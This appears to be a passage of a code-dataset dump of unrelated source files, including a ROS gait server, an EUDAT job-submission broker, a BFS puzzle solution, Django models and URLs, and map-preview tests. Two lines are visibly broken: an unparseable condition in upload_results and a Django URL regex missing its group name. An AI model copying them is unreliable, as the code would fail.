march_gait_selection.dynamic_gaits.transition_subgait import TransitionSubgait\nfrom march_shared_resources.msg import GaitAction, GaitGoal, GaitNameAction\n\nSERVER_TIMEOUT = 5\nRESPONSE_TIMEOUT = 1\n\n\nclass PerformGaitAction(object):\n def __init__(self, gait_selection):\n self.gait_selection = gait_selection\n self.action_server = actionlib.SimpleActionServer('/march/gait/perform', GaitNameAction,\n execute_cb=self.target_gait_callback,\n auto_start=False)\n self.action_server.start()\n self.schedule_gait_client = actionlib.SimpleActionClient('/march/gait/schedule', GaitAction)\n\n while not rospy.is_shutdown() and not self.schedule_gait_client.wait_for_server(rospy.Duration(SERVER_TIMEOUT)):\n rospy.logdebug('Waiting for /march/gait/schedule to come up')\n\n def target_gait_callback(self, subgait_goal_msg):\n \"\"\"Set a new target subgait over the action server march/gait/schedule.\"\"\"\n rospy.logdebug('Trying to schedule subgait {gn} {sn}'\n .format(gn=subgait_goal_msg.name, sn=subgait_goal_msg.subgait_name))\n\n gait = self.gait_selection[subgait_goal_msg.name]\n if gait:\n subgait = gait[subgait_goal_msg.subgait_name]\n if subgait:\n if subgait_goal_msg.old_name:\n old_gait_name = subgait_goal_msg.old_name\n gait_name = subgait_goal_msg.name\n subgait_name = subgait_goal_msg.subgait_name\n rospy.logdebug('Create with old gait: {og}, gait: {ng}, subgait: {sg}'\n .format(og=old_gait_name, ng=gait_name, sg=subgait_name))\n subgait = TransitionSubgait.from_subgait_names(self.gait_selection, old_gait_name,\n gait_name, subgait_name)\n trajectory_state = self.schedule_gait(subgait_goal_msg.name, subgait)\n\n if trajectory_state == actionlib.GoalStatus.SUCCEEDED:\n self.action_server.set_succeeded(trajectory_state)\n else:\n self.action_server.set_aborted(trajectory_state)\n\n return True\n\n rospy.logwarn('Gait {gn} with subgait {sn} does not exist in parsed gaits'\n .format(gn=subgait_goal_msg.name, sn=subgait_goal_msg.subgait_name))\n\n self.action_server.set_aborted('Gait {gn} with subgait {sn} does not exist in parsed gaits'\n .format(gn=subgait_goal_msg.name, sn=subgait_goal_msg.subgait_name))\n\n return False\n\n def schedule_gait(self, gait_name, subgait):\n \"\"\"Construct the goal message and send.\"\"\"\n gait_action_goal = GaitGoal()\n gait_action_goal.gait_name = gait_name\n gait_action_goal.subgait_name = subgait.subgait_name\n gait_action_goal.version = subgait.version\n gait_action_goal.gait_type = subgait.gait_type\n gait_action_goal.duration = rospy.Duration.from_sec(subgait.duration)\n gait_action_goal.trajectory = subgait.to_joint_trajectory_msg()\n\n self.schedule_gait_client.send_goal(gait_action_goal)\n self.schedule_gait_client.wait_for_result(timeout=gait_action_goal.duration + rospy.Duration(RESPONSE_TIMEOUT))\n\n return self.schedule_gait_client.get_state()\n","sub_path":"march_gait_selection/src/march_gait_selection/perform_gait_action.py","file_name":"perform_gait_action.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"207611720","text":"import os\nimport subprocess\nimport json\n\ndef get_setup_py_data(dirname):\n dirpath = os.path.dirname(os.path.realpath(__file__))\n cmd='python '+dirpath+'/print_setup_py_data.py'\n result = subprocess.run(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=dirname)\n if result.stderr:\n print(result.stderr)\n if not result.stdout:\n return None\n obj=json.loads(result.stdout.decode())\n return obj","sub_path":"releasetools/mlstatus/docker/mlstatus/get_setup_py_data.py","file_name":"get_setup_py_data.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"355495562","text":"#!/usr/bin/env python3\n\nimport os\nimport os.path\nimport pickle\nimport shutil\nimport subprocess\nimport sys\nimport time\nimport traceback\nfrom pprint import pprint\n\nimport owncloud\nfrom web3.logs import DISCARD\n\nimport broker.config as config\nimport broker.libs.git as git\nfrom broker.config import env, logging\nfrom broker.lib import get_tx_status, run\nfrom broker.utils import (\n CacheType,\n StorageID,\n _colorize_traceback,\n cd,\n compress_folder,\n log,\n popen_communicate,\n print_ok,\n sleep_timer,\n terminate,\n)\nfrom contract.scripts.lib import Job, cost\n\n\ndef _upload_results(encoded_share_token, output_file_name):\n \"\"\"Uploads results into Eudat using curl\n doc:\n - (How to upload files into shared b2drop.eudat(owncloud) repository using curl?)[https://stackoverflow.com/a/44556541/2402577]\n\n - https://stackoverflow.com/a/24972004/2402577\n cmd:\n curl -X PUT -H \\'Content-Type: text/plain\\' -H \\'Authorization: Basic \\'$encoded_share_token\\'==\\' \\\n --data-binary \\'@result-\\'$providerID\\'-\\'$index\\'.tar.gz\\' https://b2drop.eudat.eu/public.php/webdav/result-$providerID-$index.tar.gz\n\n curl --fail -X PUT -H 'Content-Type: text/plain' -H 'Authorization: Basic 'SjQzd05XM2NNcFoybk.Write'==' --data-binary\n '@0b2fe6dd7d8e080e84f1aa14ad4c9a0f_0.txt' https://b2drop.eudat.eu/public.php/webdav/result.txt\n \"\"\"\n cmd = [\n \"curl\",\n \"--fail\",\n \"-X\",\n \"PUT\",\n \"-H\",\n \"Content-Type: text/plain\",\n \"-H\",\n f\"Authorization: Basic {encoded_share_token}\",\n \"--data-binary\",\n f\"@{output_file_name}\",\n f\"https://b2drop.eudat.eu/public.php/webdav/{output_file_name}\",\n \"-w\",\n \"%{http_code}\\n\"\n # \"-v\" # verbose\n ]\n\n # some arguments requires \"\" for curl to work\n cmd_temp = cmd.copy()\n cmd_temp[5] = f'\"{cmd[5]}\" \\ \\n '\n cmd_temp[7] = f'\"{cmd[7]}\" \\ \\n '\n cmd_temp[9] = f'\"{cmd[9]}\" \\ \\n '\n\n cmd_str = \" \".join(cmd_temp)\n log(f\"==> cmd:\\n{cmd_str}\\n\") # used for test purposes\n return popen_communicate(cmd)\n\n\ndef upload_results(encoded_share_token, output_file_name, path, attempt_count=1):\n \"\"\"Wrapper for the _upload_results() function.\"\"\"\n with cd(path):\n for _ in range(attempt_count):\n p, output, error = _upload_results(encoded_share_token, output_file_name)\n if error:\n log(error)\n\n if \"Warning: Couldn't read data from file\" in error:\n logging.error(\"E: EUDAT repository did not successfully uploaded\")\n return False\n\n if p.returncode != 0 or \" [{error}] {output}\")\n time.sleep(1) # wait 1 second for next step retry to upload\n else: # success on upload\n return True\n return False\n\n\ndef _login(fname, user, password_path):\n sleep_duration = 15\n config.oc = owncloud.Client(\"https://b2drop.eudat.eu/\")\n with open(password_path, \"r\") as content_file:\n password = content_file.read().strip()\n\n for _ in range(config.RECONNECT_ATTEMPTS):\n try:\n log(\"==> Trying to login into owncloud \", end=\"\")\n config.oc.login(user, password) # May take long time to connect\n password = \"\"\n f = open(fname, \"wb\")\n pickle.dump(config.oc, f)\n f.close()\n log(\"[ ok ]\")\n except Exception:\n _traceback = traceback.format_exc()\n _colorize_traceback()\n if \"Errno 110\" in _traceback or \"Connection timed out\" in _traceback:\n logging.warning(f\"Sleeping for {sleep_duration} seconds to overcome the max retries that exceeded\")\n sleep_timer(sleep_duration)\n else:\n logging.error(\"E: Could not connect into Eudat\")\n terminate()\n else:\n return False\n logging.error(\"E: User is None object\")\n terminate()\n\n\ndef login(user, password_path, fname: str) -> None:\n if not user:\n logging.error(\"E: User is empty\")\n terminate()\n\n if os.path.isfile(fname):\n f = open(fname, \"rb\")\n config.oc = pickle.load(f)\n try:\n log(f\"## Login into owncloud from the dumped object={fname} \", end=\"\")\n config.oc.get_config()\n print_ok()\n except subprocess.CalledProcessError as e:\n logging.error(f\"FAILED. {e.output.decode('utf-8').strip()}\")\n _login(fname, user, password_path)\n else:\n _login(fname, user, password_path)\n\n\ndef share_single_folder(folder_name, f_id) -> bool:\n try:\n # folder_names = os.listdir('/oc')\n # fID = '5f0db7e4-3078-4988-8fa5-f066984a8a97@b2drop.eudat.eu'\n if not config.oc.is_shared(folder_name):\n config.oc.share_file_with_user(folder_name, f_id, remote_user=True, perms=31)\n print(\"* Sharing [ ok ]\")\n return True\n\n log(\"==> Requester folder is already shared\")\n return True\n except Exception:\n _colorize_traceback()\n return False\n\n\ndef initialize_folder(folder_to_share) -> str:\n dir_path = os.path.dirname(folder_to_share)\n tar_hash, tar_path = compress_folder(folder_to_share)\n tar_source = f\"{dir_path}/{tar_hash}.tar.gz\"\n try:\n config.oc.mkdir(tar_hash)\n except Exception as e:\n if \"405\" not in str(e):\n if not os.path.exists(f\"{env.OWNCLOUD_PATH}/{tar_hash}\"):\n try:\n os.makedirs(f\"{env.OWNCLOUD_PATH}/{tar_hash}\")\n except Exception as e:\n raise e\n else:\n log(\"==> Folder is already created\")\n else:\n log(\"==> Folder is already created\")\n\n tar_dst = f\"{tar_hash}/{tar_hash}.tar.gz\"\n\n try:\n config.oc.put_file(f\"./{tar_dst}\", tar_source)\n os.remove(tar_source)\n except Exception as e:\n if type(e).__name__ == \"HTTPResponseError\":\n try:\n shutil.copyfile(tar_source, f\"{env.OWNCLOUD_PATH}/{tar_dst}\")\n except Exception as e:\n raise e\n else:\n raise Exception(\"oc could not connected in order to upload the file\")\n\n return tar_hash\n\n\ndef get_size(f_name, oc=None) -> int:\n if oc is None:\n oc = config.oc\n return int(oc.file_info(f_name).attributes[\"{DAV:}getcontentlength\"])\n\n\ndef is_oc_mounted() -> bool:\n mount_path = \"/oc\"\n output = None\n try:\n output = run([\"findmnt\", \"--noheadings\", \"-lo\", \"source\", mount_path])\n except:\n return False\n\n if \"b2drop.eudat.eu/remote.php/webdav/\" not in output:\n print(\n \"Mount a folder in order to access EUDAT(https://b2drop.eudat.eu/remote.php/webdav/).\\n\"\n \"Please do: \\n\"\n \"mkdir -p /oc \\n\"\n \"sudo mount.davfs https://b2drop.eudat.eu/remote.php/webdav/ /oc\"\n )\n return False\n else:\n return True\n\n\ndef submit(provider, account_id, folders_to_share):\n try:\n tx_hash = _submit(provider, account_id, folders_to_share)\n receipt = get_tx_status(tx_hash)\n if receipt[\"status\"] == 1:\n logs = config.ebb.events.LogJob().processReceipt(receipt, errors=DISCARD)\n pprint(vars(logs[0].args))\n try:\n log(f\"job's index={logs[0].args['index']}\")\n log(\"SUCCESS\")\n except IndexError:\n log(\"E: Transaction is reverted\")\n except Exception:\n _colorize_traceback()\n sys.exit(1)\n\n\ndef _submit(provider, account_id, folders_to_share):\n job = Job()\n requester = config.w3.toChecksumAddress(config.w3.eth.accounts[account_id])\n job.Ebb.is_requester_valid(requester)\n job.Ebb.is_eth_account_locked(requester)\n\n provider = config.w3.toChecksumAddress(provider)\n provider_info = job.Ebb.get_provider_info(provider)\n print(f\"provider[fID]={str(provider_info['f_id'])}\")\n\n job.folders_to_share = folders_to_share.copy()\n\n try:\n git.is_repo(job.folders_to_share)\n except:\n _colorize_traceback()\n sys.exit(1)\n\n log(\"\")\n for idx, folder in enumerate(job.folders_to_share):\n if idx != 0:\n print(\"\")\n\n log(f\"==> folder_to_share={folder}\", color=\"green\")\n try:\n git.initialize_check(folder)\n git.commit_changes(folder)\n folder_hash = initialize_folder(folder)\n except:\n _colorize_traceback()\n sys.exit(1)\n\n if idx == 0:\n job_key = folder_hash\n\n # required to send string as bytes\n job.source_code_hashes.append(config.w3.toBytes(text=folder_hash))\n if not share_single_folder(folder_hash, provider_info[\"f_id\"]):\n sys.exit(1)\n\n time.sleep(0.25)\n\n log(\"\")\n log(\"==> Submitting the job\")\n job.run_time = [60] # in seconds\n job.cores = [1]\n job.data_transfer_ins = [1, 116]\n job.dataTransferOut = 1\n\n job.storage_ids = [StorageID.EUDAT, StorageID.EUDAT]\n job.cache_types = [CacheType.PRIVATE, CacheType.PUBLIC]\n job.storage_hours = [1, 1]\n job.data_prices_set_block_numbers = [0, 0]\n print(job.source_code_hashes)\n job_price, _cost = cost(provider, requester, job)\n try:\n return job.Ebb.submit_job(provider, job_key, account_id, job_price, job)\n except Exception as e:\n _colorize_traceback()\n if type(e).__name__ == \"QuietExit\":\n log(f\"E: Unlock your Ethereum Account(web3.eth.accounts[{account_id}])\", color=\"red\")\n log(\"In order to unlock an account you can use: ~/eBlocPOA/client.sh\", color=\"yellow\")\n sys.exit(1)\n","sub_path":"broker/libs/eudat.py","file_name":"eudat.py","file_ext":"py","file_size_in_byte":9860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"300491357","text":"# 아기상어\n\nfrom collections import deque\n\ndxs = [-1, 0, 0, 1]\ndys = [0, -1, 1, 0]\n\ndef bfs(x, y):\n q, visited = deque([(x, y)]), set([(x, y)])\n time = 0\n shark = 2 # 현재 아기 상어의 크기다.\n eat = 0 # 현재 크기에서, 지금까지 먹은 물고기 수다.\n eat_flag = False # 현재 상태에서 물고기를 먹은 경우,\n # for _ in range(size) 구문을 진행하지 않기 위한 플래그다.\n answer = 0\n\n while q:\n size = len(q)\n\n # 위, 그리고 왼쪽을 더 우선시해서 가야하기 때문에, BFS queue를 소팅해준다.\n q = deque(sorted(q))\n for _ in range(size):\n x, y = q.popleft()\n\n # 현재 위치에 아기 상어보다 작은 물고기가 있어서, 이를 먹은 경우.\n if board[x][y] != 0 and board[x][y] < shark:\n board[x][y] = 0\n eat += 1\n\n # 아기 상어의 크기 만큼 먹었다면, 아기 상어의 크기를 +1 해줘야한다.\n if eat == shark:\n shark += 1\n eat = 0\n\n # 먹고 난 뒤, 현재 위치를 기준으로 다시 근처를 탐색해야 하기 때문에,\n # BFS queue 와 visited 를 초기화 해준다.\n q, visited = deque(), set([(x, y)])\n eat_flag = True\n\n # 먹었을 때의 시간을 저장해둔다.\n answer = time\n\n for dx, dy in zip(dxs, dys):\n nx, ny = x + dx, y + dy\n if nx >= 0 and nx < n and ny >= 0 and ny < n and (nx, ny) not in visited:\n if board[nx][ny] <= shark:\n q.append((nx, ny))\n visited.add((nx, ny))\n\n # 현재 위치에서 먹었다면, 더 이상 위 반복문을 돌 필요가 없다.\n if eat_flag:\n eat_flag = False\n break\n\n time += 1\n return answer\n\nn = int(input())\nboard = [list(map(int , input().split())) for _ in range(n)]\n\n# 1. 초기 상어(자신)의 위치를 파악하고, 해당 자리는 판에서 비워둔다.\ns_x, s_y = None, None\nfor i in range(n):\n for j in range(n):\n if board[i][j] == 9:\n s_x, s_y = i, j\n board[i][j] = 0\n\n# 2. 시작점에서 BFS 진행\nprint(bfs(s_x, s_y))","sub_path":"class3/16236.py","file_name":"16236.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"305514005","text":"from random import randint\nfrom src.median import median, sort_and_pick_median\nfrom src import runtime\n\n\ndef test_runtime():\n print('\\ntest_median_runtime')\n args = []\n for exp in range(2, 7):\n size = 10 ** exp\n args.append([randint(-1000, 1000) for _ in range(size)])\n\n runtime(median, args=args, format_lines=_format_lines)\n assert(args == args)\n runtime(sort_and_pick_median, args=args, format_lines=_format_lines)\n\n\ndef _format_lines(times, average_time, max_time, min_time, input_values,\n output_values, func_name, include_header=True):\n \"\"\"Generator to format each line that gets saved in comma separated value\n file given the input, output, and runtime data of some function.\n \"\"\"\n # headers for rows of values\n if include_header:\n yield 'call number, {} runtime, inp, out,' \\\n ' min_time, max_time, average_time\\n'.format(func_name)\n yield '1, {}, {}, {}, {}, {}, {}\\n'\\\n .format(times[0], len(input_values[0]), output_values[0],\n min_time, max_time, average_time)\n\n count = 2\n for time, in_value, out_value \\\n in zip(times[1:], input_values[1:], output_values[1:]):\n yield '{}, {}, {}, {}\\n'\\\n .format(count, time, len(in_value), out_value)\n count += 1\n\n\nif __name__ == '__main__':\n test_runtime()\n","sub_path":"src/median/tests/test_runtime.py","file_name":"test_runtime.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"308042975","text":"import os, yaml, logging, logging.config, codecs\nfrom google.auth import environment_vars\n\n# recommendation engine service bucket path\n\nHQ_BUCKET = 'gs://recomm-job'\n\nDATA = 'data'\nMODEL = 'model'\nLOG = 'log'\n\nTRAIN_FNAME = 'data.tr'\nVALID_FNAME = 'data.vl'\n\nERR_CDE = 'err_cde'\nERR_MSG = 'err_msg'\n\n# For local use! Not on GCE\nCREDENTIAL_NAME = environment_vars.CREDENTIALS\nos.environ[CREDENTIAL_NAME] = 'D:/Python/notebook/restful/auth.json'\nLOCAL_REPO = 'D:/Python/notebook/restful/repo'\n\n\nPROJECT_ID = 'training-recommendation-engine'\nPROJECT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nclass Logging(object):\n instance = None\n sd_handler = None\n\n @staticmethod\n def logger(name):\n if Logging.instance is None:\n with codecs.open(os.path.join(os.path.dirname(__file__), 'logging.yaml'), 'r', 'utf-8') as r:\n logging.config.dictConfig(yaml.load(r))\n Logging.instance = logging\n\n logger_ = Logging.instance.getLogger(name)\n # # stack driver client\n # if Logging.sd_handler is None and os.environ.get(CREDENTIAL_NAME) is not None:\n # from google.cloud import logging as sd_logging\n # Logging.sd_handler = sd_logging.Client().get_default_handler()\n #\n # # see if exists stack driver handler\n # if Logging.sd_handler is not None:\n # logger_.addHandler(Logging.sd_handler)\n return logger_\n\n# short path of Logging.logger\ndef logger(name):\n return Logging.logger(name)\n\nclass APIClient:\n storage_client = None\n\ndef remove_cred_envars():\n if CREDENTIAL_NAME in os.environ:\n del os.environ[CREDENTIAL_NAME]\n\ndef bucket(bucket_name):\n if APIClient.storage_client is None:\n from google.cloud import storage\n APIClient.storage_client = storage.Client()\n return APIClient.storage_client.get_bucket(bucket_name)\n\n","sub_path":"recomm/trainer/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"81238861","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^login/$', views.login, name='login'),\n url(r'^dashboard/$', views.dashboard, name='dashboard'),\n url(r'^blogs/$', views.blogs, name='blogs_index'),\n url(r'^blogs/new/$', views.blogs_new, name='blogs_new'),\n url(r'^blogs/(?P[0-9]+)/edit/$', views.blogs_edit, name='blogs_edit'), \n]","sub_path":"admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"645259870","text":"\n# 문제 1 : 리스트에 저장된 문자열의 갯수를 다시 리스트에 담기\n\ndef solution(shirt_size) : # 함수 만들기\n # 지문 보고 문제 풀기~~~\n size_count = [0, 0, 0, 0, 0, 0]\n\n for ss in shirt_size : # 리스트 반복 => 리스트내 항목이 변수에 하나씩 대입\n if ss == \"XS\":\n size_count[0] += 1\n if ss == \"S\":\n size_count[1] +=1\n if ss == \"M\":\n size_count[2] +=1\n if ss == \"L\":\n size_count[3] +=1\n if ss == \"XL\":\n size_count[4] +=1\n if ss == \"XXL\":\n size_count[5] +=1\n return size_count\n answer = [ ] # 리스트\n return answer # 함수가 끝나면서 돌려주는 값 => return => 리스트를 리턴\n\nshirt_size = [\"XS\", \"S\",\"M\", \"L\", \"XL\", \"S\"]\nret = solution(shirt_size) # 함수 불러내기\n\nprint(\"solution : return value of the function\", ret, \" .\")\n\n# 문제 2\n\ndef solution(price, grade):\n answer = 0\n\n if grade == \"S\":\n answer = price*0.95\n if grade == \"G\":\n answer = price*0.9\n if grade == \"V\":\n answer = price * 0.85\n\n return int(answer)\n\nprice1 = 2500\ngrade1 = \"V\"\nret1 = solution(price1, grade1)\n\nprint(\"Solution: return value of the function in\", ret1, \".\")\n\nprice2 = 96900\ngrade2 = \"0\"\nret2 = solution(price2, grade2)\n\nprint(\"Solution: return value of the function in\", ret2, \".\")\n\n# 문제 3\n\ndef func_a(month, day):\n month_list = [31, 28, 31, 30, 31, 30, 13, 31, 30, 31, 30, 31]\n total = 0;\n for i in range(month-1):\n total += month_list[i]\n total += day\n return total -1\n\ndef solution(start_month, start_day, end_month, end_day):\n start_total = func_a(start_month, start_day)\n end_total = func_a(end_month, end_day)\n return end_total - start_total\n\nstart_month = 1\nstart_day = 2\nend_month = 2\nend_day = 2\nret = solution(start_month, start_day, end_month, end_day)\n\nprint(\"Solution: return value of the function is\", ret, \".\")\n\n# 문제 4\n\ndef func_a(arr):\n counter = [0 for _ in range(1001)]\n for x in arr:\n counter[x] += 1\n return counter\n\ndef func_b(arr):\n ret = 0\n for x in arr:\n if ret < x:\n ret = x\n return ret\n\ndef func_c(arr):\n INF = 1001\n ret = INF\n for x in arr:\n if x != 0 and ret > x:\n ret = x\n return ret\n\ndef solution(arr):\n counter =func_c(arr)\n max_cnt = func_b(counter)\n min_cnt = func_c(counter)\n return max_cnt // min_cnt\n\narr = [1, 2, 3, 3, 1, 3, 3, 2, 3, 2]\nret = solution(arr)\n\nprint(\"Solution : return value of the function is\", ret, \".\")\n\n# 문제 5\ndef solution(arr):\n left, right = 0, len(arr)-1\n while left < right:\n arr[left], arr[right] = arr[right], arr[left]\n left += 1\n right-= 1\n return arr\n\n # left가 0일 경우 right도 0 => 반복문 실행\n # arr[0], arr[0] = arr[0], arr[0]\n #1 #1 #1 #1\n #left + 1 right-1\n #left 1일경우 right -1\n #arr[1], arr[-1] = arr[-1], arr[1]\n #4 #3 #3 #4\n # left +1 right-1\n # left 2일경우 right -2\n # arr[2], arr[-2] = arr[-2], arr[2]\narr = [1, 4, 2, 3]\nret = solution(arr)\n\nprint(\"Solution: return value of the function is\", ret, \".\")\n\n# 문제 6\ndef solution(number):\n count = 0\n for i in range(1, number+1):\n current = i\n temp = count\n while current != 0:\n if current %10 == 3 or current %10 == 6 or current % 10 == 9:\n count += 1\n print(\"pair\", end = '')\n current = current // 10\n if temp == count:\n print(i, end = '')\n print(\" \", end = '')\n print(\"\")\n return count","sub_path":"파이썬 입시/COS PRO_2/문제.py","file_name":"문제.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"550202425","text":"# -*- coding: utf-8 -*-\n\"\"\" Created by Mevlana Ayas on 22/07/2017 \"\"\"\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom teamroles.models.mixins import TimeStampMixin\n\n__author__ = 'mevlanaayas'\n\n\nclass Role(TimeStampMixin):\n name = models.CharField(_('Role Name'), db_column='name', max_length=200, unique=True)\n status = models.BooleanField(default=True)\n next_role = models.ForeignKey('self',\n verbose_name=_('Next Role'),\n db_column='next_role',\n related_name='next_step',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n default=None)\n previous_role = models.ForeignKey('self',\n verbose_name=_('Previous Role'),\n db_column='previous_role',\n related_name='previous_step',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n default=None)\n\n class Meta:\n verbose_name = _('Role')\n verbose_name_plural = _('Roles')\n db_table = 'django_teams_role'\n app_label = 'teamroles'\n\n def __unicode__(self):\n return self.name\n\n def __str__(self):\n return self.name\n\n\nclass AbstractRole(TimeStampMixin):\n name = models.CharField(_('Role Name'), db_column='name', max_length=200, unique=True)\n status = models.BooleanField(default=True)\n\n class Meta:\n abstract = True\n","sub_path":"teamroles/models/role.py","file_name":"role.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"100079249","text":"from __future__ import division\n\nimport os\nimport unittest\nimport tempfile\nimport subprocess\n\nfrom os.path import join, dirname\nfrom zipfile import ZipFile\nfrom shutil import rmtree\n\nfrom httmock import HTTMock, response\n\nfrom .. import preview\n\nclass TestPreview (unittest.TestCase):\n\n def setUp(self):\n self.temp_dir = tempfile.mkdtemp(prefix='TestPreview-')\n\n def tearDown(self):\n rmtree(self.temp_dir)\n\n def test_stats(self):\n points = [(n, n) for n in range(-1000, 1001)]\n points_filename = join(self.temp_dir, 'points.bin')\n preview.write_points(points, points_filename)\n\n xmean, xsdev, ymean, ysdev = preview.stats(points_filename)\n self.assertAlmostEqual(xmean, 0)\n self.assertAlmostEqual(xsdev, 577.783263863)\n self.assertAlmostEqual(ymean, xmean)\n self.assertAlmostEqual(ysdev, xsdev)\n\n def test_calculate_bounds(self):\n points = [(-10000, -10000), (10000, 10000)]\n points += [(-1, -1), (0, 0), (1, 1)] * 100\n points_filename = join(self.temp_dir, 'points.bin')\n preview.write_points(points, points_filename)\n\n bbox = preview.calculate_bounds(points_filename)\n self.assertEqual(bbox, (-1.04, -1.04, 1.04, 1.04), 'The two outliers are ignored')\n\n def test_render_zip(self):\n '''\n '''\n def response_content(url, request):\n if url.hostname == 'a.tiles.mapbox.com' and url.path.startswith('/v4/mapbox.mapbox-streets-v7'):\n if 'access_token=mapbox-XXXX' not in url.query:\n raise ValueError('Missing or wrong API key')\n data = b'\\x1a\\'x\\x02\\n\\x05water(\\x80 \\x12\\x19\\x18\\x03\"\\x13\\t\\xe0\\x7f\\xff\\x1f\\x1a\\x00\\xe0\\x9f\\x01\\xdf\\x9f\\x01\\x00\\x00\\xdf\\x9f\\x01\\x0f\\x08\\x00'\n return response(200, data, headers={'Content-Type': 'application/vnd.mapbox-vector-tile'})\n raise Exception(\"Uknown URL\")\n\n zip_filename = join(dirname(__file__), 'outputs', 'alameda.zip')\n handle, png_filename = tempfile.mkstemp(prefix='render-', suffix='.png')\n os.close(handle)\n\n try:\n with HTTMock(response_content):\n preview.render(zip_filename, png_filename, 668, 1, 'mapbox-XXXX')\n info = str(subprocess.check_output(('file', png_filename)))\n\n self.assertTrue('PNG image data' in info)\n self.assertTrue('668 x 573' in info)\n self.assertTrue('8-bit/color RGB' in info)\n finally:\n os.remove(png_filename)\n\n def test_render_csv(self):\n '''\n '''\n def response_content(url, request):\n if url.hostname == 'a.tiles.mapbox.com' and url.path.startswith('/v4/mapbox.mapbox-streets-v7'):\n if 'access_token=mapbox-XXXX' not in url.query:\n raise ValueError('Missing or wrong API key')\n data = b'\\x1a\\'x\\x02\\n\\x05water(\\x80 \\x12\\x19\\x18\\x03\"\\x13\\t\\xe0\\x7f\\xff\\x1f\\x1a\\x00\\xe0\\x9f\\x01\\xdf\\x9f\\x01\\x00\\x00\\xdf\\x9f\\x01\\x0f\\x08\\x00'\n return response(200, data, headers={'Content-Type': 'application/vnd.mapbox-vector-tile'})\n raise Exception(\"Uknown URL\")\n\n zip_filename = join(dirname(__file__), 'outputs', 'portland_metro.zip')\n handle, png_filename = tempfile.mkstemp(prefix='render-', suffix='.png')\n os.close(handle)\n\n try:\n temp_dir = tempfile.mkdtemp(prefix='test_render_csv-')\n zipfile = ZipFile(zip_filename)\n\n with open(join(temp_dir, 'portland.csv'), 'wb') as file:\n file.write(zipfile.read('portland_metro/us/or/portland_metro.csv'))\n csv_filename = file.name\n\n with HTTMock(response_content):\n preview.render(csv_filename, png_filename, 668, 1, 'mapbox-XXXX')\n info = str(subprocess.check_output(('file', png_filename)))\n\n self.assertTrue('PNG image data' in info)\n self.assertTrue('668 x 289' in info)\n self.assertTrue('8-bit/color RGB' in info)\n finally:\n os.remove(png_filename)\n os.remove(csv_filename)\n os.rmdir(temp_dir)\n\n def test_get_map_features(self):\n '''\n '''\n def response_content(url, request):\n if url.hostname == 'a.tiles.mapbox.com' and url.path.startswith('/v4/mapbox.mapbox-streets-v7'):\n if 'access_token=mapbox-XXXX' not in url.query:\n raise ValueError('Missing or wrong API key')\n with open(join(dirname(__file__), 'data', 'mapbox-tile.mvt'), 'rb') as file:\n data = file.read()\n return response(200, data, headers={'Content-Type': 'application/vnd.mapbox-vector-tile'})\n raise Exception(\"Uknown URL\")\n\n xmin, ymin, xmax, ymax = -13611952, 4551290, -13609564, 4553048\n scale = 100 / (xmax - xmin)\n\n with HTTMock(response_content):\n landuse_geoms, water_geoms, roads_geoms = \\\n preview.get_map_features(xmin, ymin, xmax, ymax, 2, scale, 'mapbox-XXXX')\n\n self.assertEqual(len(landuse_geoms), 90, 'Should have 90 landuse geometries')\n self.assertEqual(len(water_geoms), 1, 'Should have 1 water geometry')\n self.assertEqual(len(roads_geoms), 792, 'Should have 792 road geometries')\n\n\n","sub_path":"openaddr/tests/preview.py","file_name":"preview.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"24588516","text":"#!/usr/bin/python3\n#\n# A main script to run bicycle.py\n#\n# Author: Francis Kessie\n#\nimport bicycle as bi\nimport random\n\n#create 6 diferent models of bicycles and add names, weight and cost to produce\nbikemodel1 = bi.Bicycle(\"Vampire\", 600, 15.2) \nbikemodel2 = bi.Bicycle(\"Climber\", 250, 16.5)\nbikemodel3 = bi.Bicycle(\"Venus\", 520, 16.5)\nbikemodel4 = bi.Bicycle(\"Jasper\", 150, 16.0)\nbikemodel5 = bi.Bicycle(\"Vanti\", 145, 17.0)\nbikemodel6 = bi.Bicycle(\"Jumper\", 400, 17.5)\n\n\n#Create a bicycle shop that has 6 different bicycle models in store\nbikeshop1 = bi.BikeShop(\"Speed Cyclers Coporation\")\nbikeshop1.add_bikes(bikemodel1)\nbikeshop1.add_bikes(bikemodel2)\nbikeshop1.add_bikes(bikemodel3)\nbikeshop1.add_bikes(bikemodel4)\nbikeshop1.add_bikes(bikemodel5)\nbikeshop1.add_bikes(bikemodel6)\n\n#print initial inventory, inventory is only cost to produce items\ninventory = bikeshop1.inventory\n\nprint(\"Initial inventory is ....\")\nfor model in inventory:\n print(\"{0:<8}: ${1}\".format(model.modelname, model.prodcost))\n\n \n#print initial stocks of bikes in shop and corresponding selling prices\npftmrg = 1.2 #profit margin set to 20%\nstocks = {}\nprint() \nprint(\"Selling prices are...\")\nfor model in inventory: \n stocks[model.modelname] = 